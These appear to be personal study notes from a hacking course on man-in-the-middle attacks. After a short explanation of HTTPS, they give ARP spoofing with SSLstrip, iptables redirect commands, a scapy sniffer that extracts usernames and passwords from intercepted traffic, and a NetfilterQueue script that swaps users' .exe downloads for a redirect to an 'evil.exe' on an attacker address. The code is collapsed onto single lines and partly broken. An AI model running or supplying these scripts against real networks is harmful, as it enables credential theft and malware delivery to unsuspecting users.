HTTPS:
Problem:
- Data in HTTP is sent as plain text.
- A MITM can read and edit requests and responses.
-> not secure
Solution:
- Use HTTPS.
- HTTPS is an adaptation of HTTP.
- Encrypt HTTP using TLS(Transport Layer Security) or SSL(Secure Sockets Layer).
ARP Spoofing
ARP Spoofing With SSLStrip
1. Flush route tables and execute the arp_spoof script.
iptables --flush
python3 arp_spoof.py
2. Start the SSLstrip.
sslstrip
3. Execute the following commands to redirect the packets.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
4. Run the sniff script.
#!/usr/bin/env python import scapy from scapy.layers.http import HTTPRequest from scapy.packet import Raw from scapy.sendrecv import sniff def sniff(interface): scapy.sendrecv.sniff(iface=interface, store=False, prn=process_sniffed_packet) def get_url(packet): return packet[HTTPRequest].Host.decode(errors='ignore') + packet[HTTPRequest].Path.decode(errors='ignore') def get_login_info(packet): if packet.haslayer(Raw): packet.show() load = packet[Raw].load keywords = ["email", "username", "user", "login", "password", "pass", "uid"] for keyword in keywords: if keyword in load: return load def process_sniffed_packet(packet): if packet.haslayer(HTTPRequest): url = get_url(packet) print("[+] HTTP Request >> " + url) login_info = get_login_info(packet) if login_info: print(" [+] Possible username/password > " + login_info + " ") scapy.sendrecv.sniff() sniff("eth0")
5. Browse the target website and find something interesting.
Replacing Downloads on HTTPS Pages:
1.Execute the following commands
iptables --flush iptables -I OUTPUT -j NFQUEUE --queue-num 0 iptables -I INPUT -j NFQUEUE --queue-num 0 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 echo 1 > /proc/sys/net/ipv4/ip_forward python3 arp_spoof.py
2. Modify the Python Script and execute
#!/usr/bin/env python from netfilterqueue import NetfilterQueue from scapy.layers.inet import IP, TCP from scapy.packet import Raw ack_list = [] def set_load(packet, load): packet[Raw].load = load del packet[IP].len del packet[IP].chksum del packet[TCP].chksum return packet def process_packet(packet): scapy_packet = IP(packet.get_payload()) if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP): if scapy_packet[TCP].dport == 10000: if ".exe" in scapy_packet[Raw].load.decode() and "10.0.0.43" not in scapy_packet[Raw].load.decode(): print("[+]EXE Request") ack_list.append(scapy_packet[TCP].ack) elif scapy_packet[TCP].sport == 10000: if scapy_packet[TCP].seq in ack_list: ack_list.remove(scapy_packet[TCP].seq) print("[+] Replacing file") modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently Location: http://10.0.0.43/evil-files/evil.exe ") packet.set_payload(str(modified_packet).encode()) packet.accept() queue = NetfilterQueue() queue.bind(0, process_packet) try: queue.run() except KeyboardInterrupt: print('')
3. Browse the website - https://winzip.com and try to download the executable file.
